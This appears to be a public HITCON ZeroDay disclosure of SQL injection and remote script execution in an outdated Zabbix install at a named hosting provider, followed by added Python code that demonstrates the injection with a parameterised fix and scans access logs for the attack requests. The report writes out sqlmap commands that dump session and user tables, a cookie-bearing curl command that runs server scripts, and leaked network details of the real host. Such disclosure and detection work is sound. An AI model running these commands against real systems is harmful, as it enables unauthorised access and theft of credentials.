Multiple vulnerabilities at hosting provider OO lead to RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00030
  • Vendor: 雅富科技網路有限公司
  • Title: Multiple vulnerabilities at hosting provider OO lead to RCE
  • Introduction: Old Zabbix versions have many vulnerabilities; update to the latest version immediately.

Processing Status

Current status: Public
Last Update : 2016/04/15
  • New submission
  • Reviewed
  • Reported to vendor
  • Fix status not reported
  • Not retested
  • Public

Processing History

  • 2016/01/30 13:42:47 : New submission (status updated by [email protected])
  • 2016/02/01 03:13:25 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2016/02/23 00:00:00 : Reported, no response from vendor (status updated by the HITCON ZeroDay service team)
  • 2016/04/15 18:55:20 : Public (status updated by the HITCON ZeroDay service team)

Details

  • ZDID: ZD-2016-00030
  • Reporter: chris ([email protected])
  • Risk: Critical
  • Type: Using Known Vulnerable Components

References

The system uses components with known vulnerabilities; an attacker can exploit them to execute malicious commands and even take control of the system.

Vulnerability description: OWASP - Top 10 - 2017 A9 - Using Components with Known Vulnerabilities
https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities
(This field is generated automatically by the system from the vulnerability category, as reference material.)

Description

1 SQL Injection

Vulnerability location: Monitoring > Web

HTTP request:
GET /httpmon.php?applications=1' HTTP/1.1
Host: mon.nicevps.com
Connection: close

HTTP response:
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2016 02:59:06 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: zbx_sessionid=1193945426543ca89302e4ff6311b669; expires=Tue, 01-Mar-2016 02:59:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11157

<!doctype html>
<html>
<head>
<title>mon: Status of Web monitoring [refreshed every 30 sec]</title>
<omitted>
</head>
<body class="originalblue">
<omitted>
<table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;">
<tr class="">
<td class="msg" colspan="1">
<ul class="messages">
<li class="error">pg_query(): Query failed: ERROR: unterminated quoted string at or near "', 1)"
LINE 1: ...id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)
^ [include/db.inc.php:500]</li>
<li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)] [ERROR: unterminated quoted string at or near "', 1)"
LINE 1: ...id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)
^]</li>
</ul>
</td>
</tr>
</table>
<omitted>
</body>
</html>

The applications value is pasted unquoted into the INSERT INTO profiles statement that saves the user's filter settings (value_id is a numeric column), so a single quote breaks the statement and PostgreSQL's error, including the full query text, is echoed back in the page. Note that the request carries no session cookie: the server issues a fresh zbx_sessionid and still executes the statement as userid 2, Zabbix's built-in guest account, so the injection is reachable without credentials.

Test commands (the first fingerprints the database and the current user, the second dumps the first five rows of the sessions and users tables in the public schema):
sqlmap -u "http://mon.nicevps.com/httpmon.php?applications=1" -p "applications" -o -v 0 --flush-session --random-agent --threads 10 --banner --current-db --current-user --is-dba
sqlmap -u "http://mon.nicevps.com/httpmon.php?applications=1" -p "applications" -o -v 0 -D "public" -T "sessions,users" --dump --start 1 --stop 5
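To make the injection context concrete, here is an added example (my own code, not Zabbix's and not the reporter's) that rebuilds the leaked INSERT INTO profiles statement over an in-memory sqlite3 database. The table layout, the two constructed user rows and the handler names are assumptions, and sqlite's error wording differs from PostgreSQL's, but the mechanism is the same: because value_id is numeric the parameter is concatenated unquoted, so a stray quote breaks the statement and a parenthesised subquery is accepted and executed as SQL. The hardened handler beside it validates the type and binds the value.

```python
"""Reproduce the injection context from finding 1 with sqlite3.

Added example, not Zabbix code: the schema, the row values and the
helper names are constructed to mirror the statement leaked in the
PostgreSQL error:
  INSERT INTO profiles (profileid, userid, idx, value_id, type)
  VALUES (421, 2, 'web.httpmon.applications', <applications>, 1)
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the Zabbix schema: a profiles table and a
    users table with two constructed rows (sample data, not real hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE profiles (
            profileid INTEGER, userid INTEGER, idx TEXT,
            value_id INTEGER, type INTEGER
        );
        CREATE TABLE users (userid INTEGER, alias TEXT, passwd TEXT);
        INSERT INTO users VALUES (1, 'Admin', 'constructed-hash-1');
        INSERT INTO users VALUES (2, 'guest', 'constructed-hash-2');
        """
    )
    return conn


def save_filter_vulnerable(conn: sqlite3.Connection, applications: str) -> None:
    """The bug class: the request parameter is pasted into the SQL text.
    value_id is numeric, so the value is not even quoted, which is why
    applications=1' produced "unterminated quoted string" on the page."""
    sql = (
        "INSERT INTO profiles (profileid, userid, idx, value_id, type) "
        "VALUES (421, 2, 'web.httpmon.applications', %s, 1)" % applications
    )
    conn.execute(sql)
    conn.commit()


def save_filter_safe(conn: sqlite3.Connection, applications: str) -> None:
    """Hardened form: validate the type, then bind the value as a parameter
    so the database never parses it as SQL."""
    if not applications.isdigit():
        raise ValueError("applications must be an unsigned integer")
    conn.execute(
        "INSERT INTO profiles (profileid, userid, idx, value_id, type) "
        "VALUES (?, ?, ?, ?, ?)",
        (421, 2, "web.httpmon.applications", int(applications), 1),
    )
    conn.commit()


def stored_value_ids(conn: sqlite3.Connection) -> list:
    """value_id column of every saved profile row, in insertion order."""
    return [row[0] for row in conn.execute(
        "SELECT value_id FROM profiles ORDER BY rowid")]


def probe(handler, payload: str) -> tuple:
    """Run one payload through a handler on a fresh database and report
    ('error', exception name, message) or ('stored', value_id)."""
    conn = make_db()
    try:
        handler(conn, payload)
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__, str(exc))
    return ("stored", stored_value_ids(conn)[-1])


if __name__ == "__main__":
    # The page's probe: a stray quote breaks the statement.
    print(probe(save_filter_vulnerable, "1'"))
    # The context is unquoted, so a subquery is valid SQL and runs:
    # the number of users ends up stored in the profile row.
    print(probe(save_filter_vulnerable, "(SELECT count(*) FROM users)"))
    # The hardened handler rejects the subquery and accepts a plain id.
    print(probe(save_filter_safe, "(SELECT count(*) FROM users)"))
    print(probe(save_filter_safe, "1"))
```

The subquery case is the one that matters for an assessment: a syntax error proves the parameter reaches the parser, but a stored subquery result proves attacker-controlled SQL executes, which is the precondition for the session and password dump in the second sqlmap command above.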

2 Code Execution

Vulnerability location: Administration > Scripts

HTTP request:
GET /scripts_exec.php?execute=1&hostid=11269&scriptid=8&sid=909e3fe235f13323 HTTP/1.1
Host: mon.nicevps.com
Cookie: zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323
Connection: close

HTTP response:
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2016 04:42:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323; expires=Tue, 01-Mar-2016 04:42:16 GMT
Content-Length: 5824
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>mon: Scripts</title>
<omitted>
</head>
<body class="originalblue">
<div id="message-global-wrap">
<div id="message-global"></div>
</div>
<div class="">
<div class="w" id="widget_6744">
<form class="" method="post" action="scripts_exec.php" accept-charset="utf-8" name="scriptForm">
<omitted>
<span class="pre">Linux mon.nicevps.com 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64 x86_64 x86_64 GNU/Linux
mon.nicevps.com
zabbix
61-219-193-228.HINET-IP.hinet.net (61.219.193.228) at <incomplete> on eth0
61-219-193-251.HINET-IP.hinet.net (61.219.193.251) at 00:1b:21:88:97:ab [ether] on eth0
61-219-193-237.HINET-IP.hinet.net (61.219.193.237) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-246.HINET-IP.hinet.net (61.219.193.246) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-245.HINET-IP.hinet.net (61.219.193.245) at <incomplete> on eth0
61-219-193-235.HINET-IP.hinet.net (61.219.193.235) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-249.HINET-IP.hinet.net (61.219.193.249) at <incomplete> on eth0
61-219-193-225.HINET-IP.hinet.net (61.219.193.225) at 00:30:88:db:c1:e1 [ether] on eth0
61-219-193-233.HINET-IP.hinet.net (61.219.193.233) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-242.HINET-IP.hinet.net (61.219.193.242) at <incomplete> on eth0
61-219-193-241.HINET-IP.hinet.net (61.219.193.241) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-229.HINET-IP.hinet.net (61.219.193.229) at <incomplete> on eth0
61-219-193-240.HINET-IP.hinet.net (61.219.193.240) at <incomplete> on eth0
61-219-193-239.HINET-IP.hinet.net (61.219.193.239) at <incomplete> on eth0
61-219-193-231.HINET-IP.hinet.net (61.219.193.231) at 0c:c4:7a:40:28:79 [ether] on eth0
61-219-193-252.HINET-IP.hinet.net (61.219.193.252) at fc:aa:14:50:3f:e4 [ether] on eth0
61-219-193-230.HINET-IP.hinet.net (61.219.193.230) at <incomplete> on eth0
61-219-193-250.HINET-IP.hinet.net (61.219.193.250) at 00:10:18:1a:60:df [ether] on eth0
61-219-193-253.HINET-IP.hinet.net (61.219.193.253) at 8a:c1:8e:9e:28:42 [ether] on eth0
61-219-193-227.HINET-IP.hinet.net (61.219.193.227) at <incomplete> on eth0
61-219-193-254.HINET-IP.hinet.net (61.219.193.254) at <incomplete> on eth0
61-219-193-243.HINET-IP.hinet.net (61.219.193.243) at 8c:89:a5:89:b5:72 [ether] on eth0
61-219-193-238.HINET-IP.hinet.net (61.219.193.238) at 8a:c1:8e:9e:28:42 [ether] on eth0
61-219-193-232.HINET-IP.hinet.net (61.219.193.232) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-236.HINET-IP.hinet.net (61.219.193.236) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-247.HINET-IP.hinet.net (61.219.193.247) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-244.HINET-IP.hinet.net (61.219.193.244) at <incomplete> on eth0
61-219-193-248.HINET-IP.hinet.net (61.219.193.248) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-234.HINET-IP.hinet.net (61.219.193.234) at 00:11:95:84:78:52 [ether] on eth0
eth0 Link encap:Ethernet HWaddr 8C:73:6E:B7:60:37
inet addr:61.219.193.226 Bcast:61.219.193.255 Mask:255.255.255.224
inet6 addr: fe80::8e73:6eff:feb7:6037/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:171069323 errors:0 dropped:0 overruns:0 frame:0
TX packets:304383318 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:18069164601 (16.8 GiB) TX bytes:36693826183 (34.1 GiB)
Interrupt:32 Base address:0xa000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2026774943 errors:0 dropped:0 overruns:0 frame:0
TX packets:2026774943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:705159124500 (656.7 GiB) TX bytes:705159124500 (656.7 GiB)
bin dev home lib64 media opt root selinux sys usr
boot etc lib lost+found mnt proc sbin srv tmp var</span>
</div>
</div>
</form>
</div>
</div>
<omitted>
</body>
</html>

Zabbix global scripts run on the Zabbix server (or agent) as the zabbix user. scripts_exec.php?execute=1 runs the script with scriptid=8 against hostid=11269 and needs only a valid session cookie plus the matching sid, which the Zabbix frontend derives as the last 16 characters of zbx_sessionid (here 909e3fe235f13323 from bfd4a8e3265b09fe909e3fe235f13323); a session dumped from the sessions table in finding 1 is enough. The output in the response is what the script printed on mon.nicevps.com: uname -a, hostname, the executing user (zabbix), the ARP table, the interface configuration and a listing of /.

Test command:
curl --cookie "zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323" "http://mon.nicevps.com/scripts_exec.php?execute=1&hostid=11269&scriptid=8&sid=909e3fe235f13323"
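For detection on the operator side, here is an added example (not part of the report and not Zabbix code) that runs the two request patterns from this report over constructed Apache access-log lines: non-integer values for the applications parameter of httpmon.php, and scripts_exec.php?execute=1 calls, rated higher when they come from an address outside an assumed operator allow-list. It also encodes the sid rule the request above illustrates (sid is the last 16 hex characters of zbx_sessionid), which is useful when correlating a scripts_exec request with the cookie in a full-request capture.

```python
"""Spot the two request patterns from this report in Apache access logs.

Added example, not part of the report or of Zabbix. SAMPLE_LOG is
constructed to look like the requests in findings 1 and 2, OPERATOR_IPS
is an assumed allow-list, and sid_for_session encodes how the Zabbix
frontend derives sid from zbx_sessionid.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: two injection probes, one benign filter change,
# one script execution from an unknown address, one from an operator.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jan/2016:02:59:06 +0000] "GET /httpmon.php?applications=1%27 HTTP/1.1" 200 11157
203.0.113.7 - - [30/Jan/2016:03:10:41 +0000] "GET /httpmon.php?applications=1%20AND%201=1 HTTP/1.1" 200 11102
198.51.100.2 - - [30/Jan/2016:03:15:00 +0000] "GET /httpmon.php?applications=12 HTTP/1.1" 200 11099
203.0.113.7 - - [30/Jan/2016:04:42:16 +0000] "GET /scripts_exec.php?execute=1&hostid=11269&scriptid=8&sid=909e3fe235f13323 HTTP/1.1" 200 5824
198.51.100.2 - - [30/Jan/2016:05:01:09 +0000] "GET /scripts_exec.php?execute=1&hostid=10084&scriptid=1&sid=0123456789abcdef HTTP/1.1" 200 4100
"""

# Common log format: ip ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: addresses from which operators legitimately run global scripts.
OPERATOR_IPS = {"198.51.100.2"}


def sid_for_session(zbx_sessionid: str) -> str:
    """Zabbix's CSRF token 'sid' is the last 16 characters of the 32-char
    zbx_sessionid cookie; a scripts_exec request whose sid does not match
    the cookie it was sent with is forged or replayed."""
    return zbx_sessionid[16:32]


def classify(line: str):
    """Return a finding dict for one access-log line, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs percent-decodes, so 1%27 becomes 1'
    params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    rule = detail = None
    if url.path == "/httpmon.php":
        value = params.get("applications", "")
        # Zabbix expects an application id here; anything that is not an
        # unsigned integer is a probe of the context shown in finding 1.
        if value and not value.isdigit():
            rule, detail = "httpmon_sqli_probe", "applications=" + value
    elif url.path == "/scripts_exec.php" and params.get("execute") == "1":
        detail = "hostid=%s scriptid=%s sid=%s" % (
            params.get("hostid"), params.get("scriptid"), params.get("sid"))
        rule = "scripts_exec" if m["ip"] in OPERATOR_IPS else "scripts_exec_from_unlisted_ip"
    if rule is None:
        return None
    return {"ip": m["ip"], "time": m["ts"], "rule": rule, "detail": detail}


def scan(log_text: str) -> list:
    """Classify every line of an access log and keep the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%(time)s %(ip)s %(rule)s %(detail)s" % hit)
```

Every script execution is worth logging even from an operator address, because the feature is working as designed; the unlisted-address variant is the one to page on, since it is exactly the shape of the request above.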
